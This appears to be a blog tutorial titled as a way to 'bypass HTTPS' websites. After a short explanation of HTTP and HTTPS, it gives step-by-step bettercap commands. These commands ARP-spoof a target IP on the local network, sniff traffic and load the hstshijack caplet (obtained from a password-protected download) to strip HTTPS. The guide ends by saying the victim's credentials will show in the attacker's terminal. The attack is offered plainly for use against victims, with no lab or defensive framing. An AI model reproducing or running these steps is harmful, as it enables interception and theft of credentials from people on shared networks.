In this article I’m going to teach you how to bypass HTTPS website. before that we should know HTTP and HTTPS.
HTTP stands for Hypertext Transfer Protocol, and it is a protocol – or a prescribed order and syntax for presenting information – used for transferring data over a network. Most information that is sent over the Internet, including website content and API calls, uses the HTTP protocol. There are two main kinds of HTTP messages: requests and responses
Hypertext transfer protocol secure (HTTPS) is the secure version of HTTP, which is the primary protocol used to send data between a web browser and a website. HTTPS is encrypted in order to increase security of data transfer. This is particularly important when users transmit sensitive data, such as by logging into a bank account, email service, or health insurance provider.
Now we clarify that HTTPS websites more secure form HTTP websites but we can easily bypass
HTTPS is HTTP with encryption. The only difference between the two protocols is that HTTPS uses TLS (SSL) to encrypt normal HTTP requests and responses. As a result, HTTPS is far more secure than HTTP. A website that uses HTTP has http:// in its URL, while a website that uses HTTPS has https://
How to Bypass HTTPS website?
Step 1:
First you need to download Bypass HTTPS website tool so click this below download button
Once you download then extract with the password of www.errorsfind.com
Step 2:
Now copy hstshjack folder and past to bettercap couplets location. I show the exact location seeing below
/usr/share/bettercap/caplets/
First you open bettercap caplets folder > and open your terminal on that place > then type this below command on your terminal
sudo rm -rf htshjack
First you will open your terminal on your new htshjack folder place > then type this below command on your terminal
sudo cp -r hstshijack /usr/share/bettercap/caplets/
Step 3:
Now create custom spoofing text file just copy this below all command’s and save the extension should be cap
net.probe on
net.recon on
set arp.spoof.fullduplex true
set arp.spoof.targets 172.20.10.8
arp.spoof on
set net.sniff.local true
net.sniff on
If true it will consider packets from/to this computer, otherwise it will skip them.
Step 4:
Now start the bettercap with bettercap custom script so type this below command on your terminal
sudo bettercap -iface wlan0 -caplet (your custom text file )
Step 5:
Now we need to start https bypassing. so first we will need to set cuplets so type this below command on your bettercap terminal
caplets.show
HTTPS Bypassing
Step 6:
Now choose hstshijack caplet so type this below command on your bettercap terminal.
hstshijack/hstshijack
That’s it. Now your victim type any credentials on https website that will show on your bettercap terminal.
awesome
[…] you can use all above tool to get information for an example if you find any website ip address follow this below […]